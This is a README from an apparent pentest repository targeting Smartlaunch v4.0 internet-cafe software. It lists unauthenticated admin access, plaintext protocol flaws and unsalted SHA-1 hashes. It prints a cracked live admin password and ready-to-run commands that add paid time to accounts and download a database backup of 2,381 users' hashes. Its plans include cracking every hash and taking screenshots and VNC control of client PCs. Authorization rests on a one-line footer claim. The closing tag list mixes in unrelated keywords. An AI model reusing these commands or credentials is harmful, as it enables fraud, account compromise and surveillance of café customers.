Desstter/ciberpentest

# Smartlaunch v4.0 — 安全研究 ## IA 快速导航 | 我想要... | 阅读 | |-----------|------| | 快速回顾 — 有什么，缺什么 | `PROGRESS.md` 的“当前状态”部分 | | 操纵数据库（增加时间、积分） | `ATTACK_PLAYBOOK.md` 攻击 11-13 | | 使用代码执行任何攻击 | `ATTACK_PLAYBOOK.md` | | 理解 TCP 协议 | `PROTOCOL.md` | | 查看所有漏洞 | `FINDINGS.md` | | 数据库向量 — 技术分析 | `FINDINGS.md` 第 9 节 | | 源代码分析 | `analysis_output/decompile_findings.md` | ## 当前状态 — 29/03/2026 ``` ACCESO ADMIN TOTAL: AdminID=2{end} + Logon=Admin^zoro123{end} CREDENCIALES: Admin : zoro123 (hash DB crackeado, activo) Admin : admin (hash Client.inf, password antiguo) DB DESCARGADA: smartlaunch1_backup.mdb — 2,381 usuarios, 11,815 transacciones SERVER DESCARGADO: Server.exe (4.4 MB) — decompilado con ilspycmd MANIPULACION DB CONFIRMADA EN VIVO (Sesion 8): UserAddTime=test^60^0^1 -> SetUserTimePrice=test^1079^61,18^63,60^True MONTO=60 son PESOS, no minutos. Servidor calcula minutos segun tarifa vigente. SI deja log financiero permanente (INSERT FinancialTransactions en DB). Reporte financiero: GetTransactionList=46110^46111^0^0^True (OADate!) ``` ## 已确认的漏洞 | ID | 严重性 | 描述 | 状态 | |----|-----------|-------------|--------| | VUL-1 | 严重 | `AdminID=2-50` 在无凭据的情况下被接受 | 已确认 | | VUL-2 | 严重 | 明文 TCP 没有 TLS — 一切均可被拦截 | 已确认 | | VUL-3 | 高危 | `UserLoginApproved` 泄露了用户的 SHA-1 哈希 | 已确认 | | VUL-4 | 高危 | 用户枚举无速率限制 | 已确认 | | VUL-5 | 高危 | 无盐 SHA-1 — Admin:zoro123 (活跃) 已被破解 | 已破解 | | VUL-6 | 中危 | FileTransfer 无需员工身份验证 — Server.exe 可被下载 | 已确认 | | VUL-7 | 中危 | `UpdateLog` 向任何 AdminID 广播 | 已确认 | | VUL-8 | 严重 | 数据库备份可通过 FileTransfer 下载 — 1.19 GB，包含哈希 | 已确认 | ## 今天可用的功能（即拿即用的命令） ``` # 完整认证 (2 步) AdminID=2{end} -> ConnectionApproved Logon=Admin^zoro123{end} -> (silencio = exito) # 如果 AccessDenied=3：使用 ForceLogon=Admin^zoro123{end} # 实时活动用户 OpenUserAccounts{end} -> SetUserTimePrice=USER^MINS^COSTO^HISTORICO^ACTIVO # PC 状态 GetComputerState{end} -> SetComputerState=... # 活跃收银员 GetCurrentCashier{end} -> SetCurrentCashier=Admin^ID,TOKEN # *** 现场确认 — 添加持久化到 DB 的实时数据 *** UserAddTime=test^60^0^1{end} # -> SetUserTimePrice=test^1079^61,18^63,60^True # 金额=60 为哥伦比亚比索 (非分钟)。服务器根据费率计算分钟数。 # PAYTYPE: 0=现金 | LOGFLAG: 1=记录到财务日志 # 延长活动会话 (仅 RAM — 不会持久化到 DB) UserContinueSession=moonhellal^60{end} -> RemoveUserLogoutList=moonhellal^60 # 当日财务报告 — 重要：使用 OADate (整数)，而非日期字符串 # 29/03/2026 = 46110 | 计算：[DateTime]::new(2026,3,29).ToOADate() GetTransactionList=46110^46111^0^0^True{end} # -> RetrieveReport=Transaction History Report (03-29-2026).rpt^False # 然后下载：FileTransfer=2^-1^2^Temporary\^Transaction History Report (03-29-2026).rpt{end} # 下载 DB 备份 (3 步 — 见 ATTACK_PLAYBOOK.md 攻击 2) FileTransfer=2^-1^2^db\backup\^smartlaunch1.mdb{end} ``` ## 仓库结构 ``` README.md <- este archivo — indice y estado actual PROTOCOL.md <- spec completa del protocolo TCP puerto 7831 FINDINGS.md <- hallazgos detallados, vectores confirmados y descartados ATTACK_PLAYBOOK.md <- ataques paso a paso con codigo PowerShell listo para ejecutar PROGRESS.md <- log cronologico de sesiones analysis_output/ decompile_findings.md <- analisis profundo del codigo fuente (ilspycmd) dll_reflection.md <- tipos y enums de Communication.dll server_strings.md <- strings extraidos de Server.exe Server_src/ <- ~150 archivos C# decompilados de Server.exe Communication_src/ <- C# decompilado de Communication.dll downloads/ Server.exe <- 4,665,344 bytes smartlaunch updater.exe <- 126,976 bytes smartlaunch1_backup.mdb <- DB backup (1.19 GB) — 2,381 usuarios + hashes tx_report_hoy.rpt <- Reporte financiero 29/03/2026 (14,848 bytes, Crystal Reports OLE) Client.inf <- config de PC025 (IP, puerto, hash empleado, restricciones) phase5_user_access.ps1 <- simulacion completa de acceso admin check_moonhellal.ps1 <- verificacion rapida de estado de usuario test_useradd_time.ps1 <- prueba UserAddTime en usuario "test" con verificacion de logs ``` ## 优先待办事项 ``` PRIORIDAD MAXIMA — Manipulacion de DB: 1. [CONFIRMADO con "test"] UserAddTime=moonhellal^60^0^1{end} -> INSERT FinancialTransactions — agrega tiempo real que persiste en DB -> MONTO=60 pesos -> ~1019 minutos a tarifa vigente -> Ver ATTACK_PLAYBOOK.md Ataque 11 2. ExternalAuthorization=Admin^zoro123{end} -> Authorized{end} Luego: Luego: -> Escribe a DB via modulo WebInterface — Ver ATTACK_PLAYBOOK.md Ataque 12 3. UserOpenAccount=moonhellal^120^1{end} -> Abre sesion real con balance real — Ver ATTACK_PLAYBOOK.md Ataque 13 ALTA PRIORIDAD: 4. GetClientScreenshot=1 -> screenshot en tiempo real de PC activo 5. StartVNCServer=1 -> control remoto VNC 6. hashcat -m 100 hashes_usuarios.txt rockyou.txt -> 2,381 hashes SHA-1 7. GetExportLogData{end} -> logs del servidor 8. GetCashReport=46082^46111^0^0^True -> reporte financiero mes de marzo ``` ## 工具 - **PowerShell** — 侦察和利用脚本（根目录） - **ilspycmd 9.1** — 对 Server.exe 和 Communication.dll 进行 .NET 反编译 - **OleDB/Jet 4.0** — 读取下载的 .mdb 文件 - **hashcat** — 破解无盐 SHA-1 *授权的安全测试 — E-Sports Colombia*

标签：AI合规, CVE, HTTP工具, ILSpy, IT安全, Maven, SHA1破解, Smartlaunch, TCP协议分析, 云资产清单, 代码反编译, 凭据破解, 多人体追踪, 数字签名, 数据展示, 数据库操纵, 数据泄露, 无线安全, 明文传输, 未授权访问, 漏洞分析, 漏洞验证, 红队, 网吧管理软件, 网络安全, 路径探测, 逆向工程, 防御绕过, 隐私保护